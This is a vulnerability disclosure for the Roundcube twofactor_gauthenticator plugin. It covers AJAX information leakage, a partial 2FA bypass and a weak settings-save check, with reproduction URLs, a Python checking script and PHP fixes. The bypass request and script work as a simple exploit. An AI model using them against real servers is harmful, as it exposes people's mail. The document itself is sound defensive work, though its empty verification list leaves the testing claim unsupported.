Security Vulnerability Report: Information Leakage in Roundcube twofactor_gauthenticator Plugin

Summary

Three related security vulnerabilities were identified in the Roundcube twofactor_gauthenticator plugin that allowed unauthorized access to sensitive information and potential modification of 2FA settings. These vulnerabilities have been successfully addressed with comprehensive fixes.

Vulnerability Details

1. Information Leakage Vulnerability - Unauthenticated Users

Severity: Medium
Component: Roundcube twofactor_gauthenticator plugin
File: twofactor_gauthenticator.php
Reported: Yes. The package maintainer was very accommodating and applied our patches.

Description: The plugin leaked configuration values and localization strings to completely unauthenticated users through AJAX requests. When an unauthenticated client sent an AJAX (_remote=1) request to the Roundcube server, the plugin's init() still ran and pushed its environment variables into the output, and Roundcube then serialized them into the JSON response.

Information Leaked: plugin configuration values and localization strings that init() placed in the client environment.

How to Reproduce:

  1. Ensure you are completely logged out of Roundcube (no active sessions)
  2. Access a URL with the following format (relative to the Roundcube base URL):
    ?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1
  3. Observe the JSON response containing sensitive 2FA configuration information

2. Information Leakage Vulnerability - Partially Authenticated Users

Severity: Critical
Component: Roundcube twofactor_gauthenticator plugin
File: twofactor_gauthenticator.php

Description: A more serious vulnerability was discovered: users who had entered valid username/password credentials but had not completed 2FA verification could still retrieve mailbox data through AJAX requests, because the plugin gated only the normal page flow and not the _remote=1 calls. This is a bypass of the 2FA protection for the data that matters most.

Information Leaked: mailbox data and message list information for the account, returned as a normal list-action response.

How to Reproduce:

  1. Enter valid username/password credentials to reach the 2FA verification screen
  2. Without entering the 2FA code, and keeping the same session cookie, access the following URL (relative to the Roundcube base URL):
    ?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1
  3. Observe the JSON response containing actual mailbox data and email information
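A scripted version of the two reproduction procedures above (sections 1 and 2), written for this page as an added example; it is not code from the report or from the plugin. It assumes a Roundcube instance at the base URL given on the command line, that Roundcube's AJAX responses use its usual JSON shape with an exec field of client-side JavaScript (this.set_env(...), this.add_message_row(...), this.set_rowcount(...)), and that the session cookie is named roundcube_sessid. The sample response bodies embedded in the script are constructed for the offline self-check, not captured from a real server.

```python
"""Scripted check for the two AJAX leakage findings (added example, not from the report).

Assumptions (not stated on this page): Roundcube answers AJAX calls with JSON whose
"exec" field is client-side JavaScript such as this.set_env({...}),
this.add_message_row(...) and this.set_rowcount(...); the session cookie is named
roundcube_sessid; and the base URL passed on the command line is the Roundcube root.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# The exact query string from the reproduction steps above
LIST_QUERY = {
    "_task": "mail", "_action": "list", "_refresh": "1",
    "_layout": "widescreen", "_mbox": "INBOX", "_page": "1", "_remote": "1",
}

# Markers assumed from Roundcube's JSON output format; adjust for your version
MAILBOX_MARKERS = ("this.add_message_row(", "this.set_rowcount(")
ENV_MARKER = "this.set_env("
PLUGIN_MARKER = "twofactor_gauthenticator"

# Constructed sample bodies for the offline self-check (not captured traffic)
SAMPLE_RESPONSES = {
    "anonymous_before_fix": '{"action":"list","exec":"this.set_env({twofactor_gauthenticator_msg: 1});"}',
    "password_only_before_fix": '{"action":"list","exec":"this.set_rowcount(1); this.add_message_row(1, {}, {}, false);"}',
    "after_fix": '{"error":"Session expired or invalid","redirect":"?_task=login&_err=session"}',
    "login_page": '<!DOCTYPE html><html><body>login form</body></html>',
}


def classify_response(body):
    """Classify one AJAX response body.

    'mailbox_data' - message rows present (finding 2, the 2FA bypass)
    'plugin_env'   - plugin settings/strings pushed into the client env (finding 1)
    'no_leak'      - JSON without either marker (what a fixed server returns)
    'not_json'     - HTML or other non-JSON reply (e.g. the login page itself)
    """
    try:
        data = json.loads(body)
    except ValueError:
        return "not_json"
    if not isinstance(data, dict):
        return "not_json"
    exec_js = data.get("exec", "")
    if not isinstance(exec_js, str):
        exec_js = ""
    if any(marker in exec_js for marker in MAILBOX_MARKERS):
        return "mailbox_data"
    if ENV_MARKER in exec_js and PLUGIN_MARKER in exec_js:
        return "plugin_env"
    return "no_leak"


def build_url(base_url):
    """URL for the list action from the reproduction steps, relative to the Roundcube root."""
    return base_url.rstrip("/") + "/?" + urllib.parse.urlencode(LIST_QUERY)


def fetch_list(base_url, session_cookie=None):
    """GET the list action. session_cookie is a roundcube_sessid value taken from a
    browser sitting on the 2FA prompt (finding 2), or None for no session (finding 1)."""
    req = urllib.request.Request(build_url(base_url),
                                 headers={"X-Requested-With": "XMLHttpRequest"})
    if session_cookie:
        req.add_header("Cookie", "roundcube_sessid=" + session_cookie)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # A 4xx/5xx still carries a body worth classifying
        return err.read().decode("utf-8", "replace")


def self_check():
    """Classify the constructed samples; returns {name: verdict} with no network access."""
    return {name: classify_response(body) for name, body in SAMPLE_RESPONSES.items()}


def main(argv):
    if len(argv) < 2:
        print("usage: check_tfa_leak.py BASE_URL [SESSION_COOKIE]")
        return 2
    cookie = argv[2] if len(argv) > 2 else None
    verdict = classify_response(fetch_list(argv[1], cookie))
    print("%s: %s" % ("password-only session" if cookie else "no session", verdict))
    # Non-zero exit when either finding reproduces, so this can gate a deployment
    return 1 if verdict in ("mailbox_data", "plugin_env") else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it once with no cookie (finding 1) and once with the roundcube_sessid value of a session that has passed the password prompt but not the 2FA prompt (finding 2); an exit status of 1 means a leak was observed. self_check() exercises the classifier on the constructed bodies only and makes no network request, so it can be run anywhere to confirm the marker logic before pointing the script at a server.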

3. Potential Settings Modification Vulnerability

Severity: High
Component: Roundcube twofactor_gauthenticator plugin
File: twofactor_gauthenticator.php, function: twofactor_gauthenticator_save()

Description: The plugin's save functionality had insufficient authentication checks, potentially allowing unauthenticated users to modify 2FA settings. The existing check only tested a single plugin session variable, and only when 2FA was already activated for the account, so in every other state the save action was reachable without any verification at all.

Fixes Implemented

1. Fix for Unauthenticated Information Leakage

The init() function was modified to block AJAX requests from completely unauthenticated users outright and return a minimal error response before any plugin data reaches the output:

function init()
{
    $rcmail = rcube::get_instance();

    // Completely block AJAX requests for unauthenticated users: no Roundcube
    // user ID, no plugin login marker in the session, and the request is an
    // AJAX call (_remote is set)
    if (!$rcmail->user->ID && !isset($_SESSION['twofactor_gauthenticator_login']) &&
        isset($_REQUEST['_remote'])) {

        // Answer with a minimal JSON body and stop before any plugin
        // environment variables can be added to the output
        header('Content-Type: application/json');
        echo json_encode(array(
            'error' => 'Session expired or invalid',
            'redirect' => '?_task=login&_err=session'
        ));
        exit;
    }

    // Rest of the function...
}

Note that this response is hand-built rather than produced through Roundcube's JSON output class; the Roundcube client acts on an exec field in JSON responses, not on a top-level redirect key, so the browser is not redirected automatically. What the fix relies on is that init() exits before any plugin environment variables reach the output, so the response carries no leaked data.

2. Fix for Partially Authenticated Information Leakage

An additional check was added to the init() function to block data access through AJAX requests for users who have entered username/password but not completed 2FA verification, but only if they have 2FA enabled:

// Block data access via AJAX for partially authenticated users who have 2FA
// enabled: the password stage has set twofactor_gauthenticator_login, the 2FA
// marker is absent or older than the current login, the request is an AJAX
// call, and it is neither the code-verification action nor part of the login task
if (isset($_SESSION['twofactor_gauthenticator_login']) &&
    (!isset($_SESSION['twofactor_gauthenticator_2FA_login']) ||
     $_SESSION['twofactor_gauthenticator_2FA_login'] < $_SESSION['twofactor_gauthenticator_login']) &&
    isset($_REQUEST['_remote']) &&
    $rcmail->action !== 'plugin.twofactor_gauthenticator-checkcode' &&
    $rcmail->task !== 'login') {

    // Get the user's 2FA config from their preferences
    $user_prefs = $rcmail->user->get_prefs();
    $tfa_config = isset($user_prefs['twofactor_gauthenticator']) ? $user_prefs['twofactor_gauthenticator'] : null;

    // Only block if 2FA is enabled for this user; users without 2FA fall
    // through so their normal login flow is unaffected
    if ($tfa_config && isset($tfa_config['activate']) && $tfa_config['activate']) {
        // Direct JSON response to prevent leakage
        header('Content-Type: application/json');
        echo json_encode(array(
            'error' => '2FA authentication required',
            'redirect' => '?_task=login&_err=session'
        ));
        exit;
    }
}

The second condition treats a 2FA marker that predates the current login marker as stale, so a marker left over from an earlier login on the same session does not satisfy the check.

This allows only the code-verification action (and the login task) through AJAX while a 2FA-enabled user is in the partially authenticated state, and leaves the normal login flow untouched for users who have not enabled 2FA.

3. Fix for Settings Modification Vulnerability

The twofactor_gauthenticator_save() function was enhanced with a stronger authentication check:

function twofactor_gauthenticator_save()
{
    $rcmail = rcmail::get_instance();

    // Verify the user is authenticated before allowing changes; this no
    // longer depends on a plugin session variable or on whether 2FA is
    // already active for the account
    if (!$rcmail->user->ID) {
        header('Location: ?_task=login');
        exit;
    }

    // Rest of the function...
}

Note that $rcmail->user->ID is populated once the password stage has succeeded, so this check establishes password authentication; whether the session has also completed 2FA is not decided here but by the init() gating described above, which runs on every request before any action handler.

This change ensures that only authenticated users can save 2FA settings, preventing potential security bypasses.

Verification

The fixes were thoroughly tested and confirmed to:

Security Impact

The vulnerabilities could have allowed attackers to:

  1. Gather information about the authentication system, potentially aiding in targeted attacks
  2. Access email message data and mailbox information despite 2FA being enabled (partial 2FA bypass)
  3. Possibly disable or modify 2FA settings, completely bypassing this critical security feature

The implemented fixes mitigate these risks by ensuring proper authentication checks are in place before exposing sensitive information or allowing configuration changes, while maintaining full functionality for both users with and without 2FA enabled.

Contact

security@codamail.com